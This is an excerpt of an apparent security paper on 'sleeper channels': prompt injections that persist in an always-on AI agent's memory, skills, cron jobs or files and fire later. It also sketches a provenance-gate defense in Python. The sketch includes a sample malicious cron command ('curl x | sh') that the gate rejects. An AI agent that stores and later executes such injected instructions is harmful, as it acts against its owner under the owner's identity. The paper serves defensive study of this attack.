Sleeper Channels and Provenance Gates: Persistent Prompt Injection in Always-on Autonomous AI Agents

Narek Maloyan; Dmitry Namiot

Abstract

Always-on AI agents (OpenClaw, Hermes Agent) run as a single persistent process under the owner’s identity, folding messaging, memory, self-authored skills, scheduling, and shell into one authority boundary. This configuration opens what we call sleeper channels: an untrusted input to one surface persists as a memory, skill, scheduled job, or filesystem patch, then fires later through a different surface with no attacker present. Two independent axes define the class: persistence substrate and firing-separation. We walk a confused-deputy cron attack end-to-end through OpenClaw at a pinned commit. The defense is tiered (D1, D2, D3), and D2 carries a soundness theorem against seven named deployment invariants. D2 keys on a canonical action-instance digest with one-shot owner attestations, defeating paraphrase laundering, multi-input grant reuse, and replay. A companion artifact ships the gate, a static audit over the vendored source, and a runtime adapter realising five of the ten mediation hooks (H1, H2, H3, H6, H9) around the cron path (42 tests, Node ≥ 20, at github.com/maloyan/sleeper-channels). Empirical evaluation is preregistered as follow-on work.
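
The D2 idea described above, a canonical action-instance digest combined with one-shot owner attestations, can be illustrated with a minimal sketch. It is written in Python rather than the artifact's Node code. Every name in it is a hypothetical stand-in and not the API of the sleeper-channels repository: ActionInstance, action_digest, ProvenanceGate, the sorted-key JSON canonical form, HMAC-SHA-256 as the attestation primitive, and the in-memory nonce set. The digest covers the action kind, its concrete arguments, and the provenance IDs of every contributing input. It deliberately excludes the model's free-text summary.

```python
import hashlib
import hmac
import json
import secrets
from dataclasses import dataclass, field


@dataclass
class ActionInstance:
    """A concrete side-effecting action (hypothetical schema), e.g. adding a cron job."""
    kind: str                # e.g. "cron.add"
    args: dict               # concrete arguments that will actually execute
    input_ids: frozenset     # provenance IDs of every input that shaped the action
    description: str = ""    # model-written summary; deliberately NOT digested


def action_digest(a: ActionInstance) -> str:
    """SHA-256 over a canonical JSON form of (kind, args, sorted input IDs)."""
    canon = json.dumps(
        {"kind": a.kind, "args": a.args, "inputs": sorted(a.input_ids)},
        sort_keys=True,
        separators=(",", ":"),
    )
    return hashlib.sha256(canon.encode("utf-8")).hexdigest()


@dataclass
class ProvenanceGate:
    owner_key: bytes
    spent: set = field(default_factory=set)  # nonces of attestations already used

    def _tag(self, digest: str, nonce: str) -> str:
        msg = f"{digest}|{nonce}".encode("utf-8")
        return hmac.new(self.owner_key, msg, hashlib.sha256).hexdigest()

    def attest(self, a: ActionInstance) -> tuple:
        """Owner side: bind a fresh nonce to this exact action instance."""
        nonce = secrets.token_hex(16)
        return nonce, self._tag(action_digest(a), nonce)

    def authorize(self, a: ActionInstance, nonce: str, tag: str) -> bool:
        """Agent side: allow once, and only for the instance that was attested."""
        if nonce in self.spent:
            return False  # replay of an already-consumed attestation
        if not hmac.compare_digest(self._tag(action_digest(a), nonce), tag):
            return False  # different args, different input set, or forged tag
        self.spent.add(nonce)  # consume: the attestation is one-shot
        return True


if __name__ == "__main__":
    gate = ProvenanceGate(owner_key=secrets.token_bytes(32))
    job = ActionInstance("cron.add", {"schedule": "0 3 * * *", "cmd": "backup.sh"},
                         frozenset({"msg:owner-1"}), "nightly backup")
    nonce, tag = gate.attest(job)

    # Same summary, different command: the digest differs, so the grant does not transfer.
    evil = ActionInstance("cron.add", {"schedule": "0 3 * * *", "cmd": "curl x | sh"},
                          frozenset({"msg:owner-1"}), "nightly backup")
    print(gate.authorize(evil, nonce, tag))  # False
    # Same command, but an extra untrusted input contributed: also a different digest.
    mixed = ActionInstance(job.kind, job.args, frozenset({"msg:owner-1", "web:page-9"}))
    print(gate.authorize(mixed, nonce, tag))  # False
    print(gate.authorize(job, nonce, tag))    # True (first use)
    print(gate.authorize(job, nonce, tag))    # False (replay)
```

Leaving the summary out of the digest is the choice aimed at paraphrase laundering, because approval attaches to what will run rather than how it was described. Digesting the full input set blocks reuse of a grant when another input joins, and consuming the nonce on first success blocks replay. The sketch keeps spent nonces in memory only. An always-on agent would need to persist them to survive restarts.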

References

“OpenClaw: Personal AI assistant runtime,” https://github.com/openclaw/openclaw, commit f53e789caf565e60ba29cb9751829b1b6, 2026- -27, 2026.

Nous Research, “Hermes Agent,” https://github.com/nousresearch/hermes-agent, commit d75dea5a86aec599b1e081f8bbe9170bd3f964, 2026-04-27; release v0.11.0, 2026-04-23, 2026.

K. Greshake, S. Abdelnabi, S. Mishra, C. Endres, T. Holz, and M. Fritz, “Not what you’ve signed up for: Compromising real-world LLM-integrated applications with indirect prompt injection,” in Proc. 16th ACM Workshop on Artificial Intelligence and Security (AISec), 2023, arXiv:2302.12173.

E. Debenedetti, J. Zhang, M. Balunovic, L. Beurer-Kellner, M. Fischer, and F. Tramèr, “AgentDojo: A dynamic environment to evaluate prompt injection attacks and defenses for LLM agents,” in Advances in Neural Information Processing Systems, Datasets and Benchmarks Track, 2024, arXiv:2406.13352.

S. S. Srivastava, “MemoryGraft: Persistent compromise of LLM agents via poisoned experience retrieval,” arXiv:2512.16962, Dec. 2025.

E. Hubinger et al., “Sleeper agents: Training deceptive LLMs that persist through safety training,” arXiv:2401.05566, Jan. 2024.

N. Hardy, “The confused deputy (or why capabilities might have been invented),” ACM SIGOPS Operating Systems Review, vol. 22, no. 4, pp. 36–38, 1988.

M. S. Miller, “Robust composition: Towards a unified approach to access control and concurrency control,” Ph.D. dissertation, Johns Hopkins University, 2006.

OpenClaw maintainers, “OpenClaw threat model v1.0 (MITRE ATLAS),” docs/security/THREAT-MODEL-ATLAS.md, OpenClaw repository at commit 3120401f53e789caf565e60ba29cb9751829b1b6, last updated 2026-02-04, 2026.

Anonymous community contributor, “Feature: Runtime prompt injection defenses,” Upstream issue (date, handle, and number anonymized for double-blind review), declined upstream, 2026.

F. Perez and I. Ribeiro, “Ignore previous prompt: Attack techniques for language models,” arXiv:2211.09527, 2022.

S. Toyer, O. Watkins, E. A. Mendes, J. Svegliato, L. Bailey, T. Wang, I. Ong, K. Elmaaroufi, P. Abbeel, T. Darrell, A. Ritter, and S. Russell, “Tensor Trust: Interpretable prompt injection attacks from an online game,” arXiv:2311.01011, 2023.

H. Zhang, J. Huang, K. Mei, Y. Yao, Z. Wang, C. Zhan, H. Wang, and Y. Zhang, “Agent security bench (ASB): Formalizing and benchmarking attacks and defenses in LLM-based agents,” arXiv:2410.02644, 2024.

Q. Zhan, Z. Liang, Z. Ying, and D. Kang, “InjecAgent: Benchmarking indirect prompt injections in tool-integrated large language model agents,” Findings of ACL, 2024.

Z. Chen, Z. Xiang, C. Xiao, D. Song, and B. Li, “AgentPoison: Red-teaming LLM agents via poisoning memory or knowledge bases,” Proc. NeurIPS, 2024.

W. Zou, R. Geng, B. Wang, and J. Jia, “PoisonedRAG: Knowledge corruption attacks to retrieval-augmented generation of large language models,” Proc. USENIX Security Symposium, 2024.

M. Nasr et al., “The attacker moves second: Stronger adaptive attacks bypass defenses against LLM jailbreaks and prompt injections,” arXiv:2510.09023, Oct. 2025.

N. Carlini, M. Nasr, C. A. Choquette-Choo, M. Jagielski, I. Gao, A. Awadalla, P. W. Koh, D. Ippolito, K. Lee, F. Tramèr, and L. Schmidt, “Are aligned neural networks adversarially aligned?” Proc. NeurIPS, 2024.

J. H. Saltzer and M. D. Schroeder, “The protection of information in computer systems,” Proceedings of the IEEE, vol. 63, no. 9, pp. 1278–1308, 1975.

M. S. Miller, K.-P. Yee, and J. Shapiro, “Capability myths demolished,” Tech. Rep. SRL2003-02, Johns Hopkins Univ. Systems Research Laboratory, 2003.

H. M. Levy, Capability-based computer systems. Digital Press, 1984.

Meta AI Security, “Agents rule of two: A practical approach to AI agent security,” Tech. blog, Oct. 2025.

D. E. Denning, “A lattice model of secure information flow,” Communications of the ACM, vol. 19, no. 5, pp. 236–243, 1976.

L. Wall, T. Christiansen, and J. Orwant, Programming Perl, 3rd ed. O’Reilly, 2000.

G. E. Suh, J. W. Lee, D. Zhang, and S. Devadas, “Secure program execution via dynamic information flow tracking,” in Proc. 11th Int. Conf. Architectural Support for Programming Languages and Operating Systems (ASPLOS), 2004, pp. 85–96.

W. Enck, P. Gilbert, S. Han, V. Tendulkar, B.-G. Chun, L. P. Cox, J. Jung, P. McDaniel, and A. N. Sheth, “TaintDroid: An information-flow tracking system for realtime privacy monitoring on smartphones,” in Proc. 9th USENIX Symp. Operating Systems Design and Implementation (OSDI), 2010, pp. 393–407.

E. J. Schwartz, T. Avgerinos, and D. Brumley, “All you ever wanted to know about dynamic taint analysis and forward symbolic execution (but might have been afraid to ask),” in Proc. IEEE Symp. Security and Privacy (S&P), 2010, pp. 317–331.

M. Costa et al., “Securing AI agents with information-flow control,” arXiv:2505.23643, 2025.

E. Debenedetti, I. Shumailov, T. Fan, J. Hayes, N. Carlini, D. Fabian, C. Kern, C. Shi, F. Tramèr, and A. Terzis, “Defeating prompt injections by design,” arXiv:2503.18813, 2025.

M. Surbatovich, J. Aljuraidan, L. Bauer, A. Das, and L. Jia, “Some recipes can do more than spoil your appetite: Analyzing the security and privacy risks of IFTTT recipes,” in Proc. 26th Int. Conf. World Wide Web (WWW), 2017, pp. 1501–1510.

Q. Wang, W. U. Hassan, A. Bates, and C. A. Gunter, “Fear and logging in the Internet of Things,” in Proc. NDSS, 2018.

OWASP Foundation, “Agentic Security Initiative,” https://genai.owasp.org/initiatives/agentic-security-initiative/, accessed Apr. 2026.

Z. Deng, Y. Guo, C. Han, W. Ma, J. Xiong, S. Wen, and Y. Xiang, “AI agents under threat: A survey of key security challenges and future pathways,” arXiv:2406.02630, 2025.

F. He, T. Zhu, D. Ye, B. Liu, W. Zhou, and P. S. Yu, “The emerged security and privacy of LLM agent: A survey with case studies,” arXiv:2407.19354, 2024.

Z. Zhong, Z. Huang, A. Wettig, and D. Chen, “Poisoning retrieval corpora by injecting adversarial passages,” in Proc. EMNLP, 2023.

Trusted Computing Group, “TPM 2.0 library specification, part 1: Architecture,” Specification Version 1.59, 2019.

Y. Liu, Y. Jia, R. Geng, J. Jia, and N. Z. Gong, “Formalizing and benchmarking prompt injection attacks and defenses,” in Proc. 33rd USENIX Security Symposium, 2024, arXiv:2310.12815.

C. Collberg and T. A. Proebsting, “Repeatability in computer systems research,” Communications of the ACM, vol. 59, no. 3, pp. 62–69, 2016.

ISSN: 2307-8162

International Journal of Open Information Technologies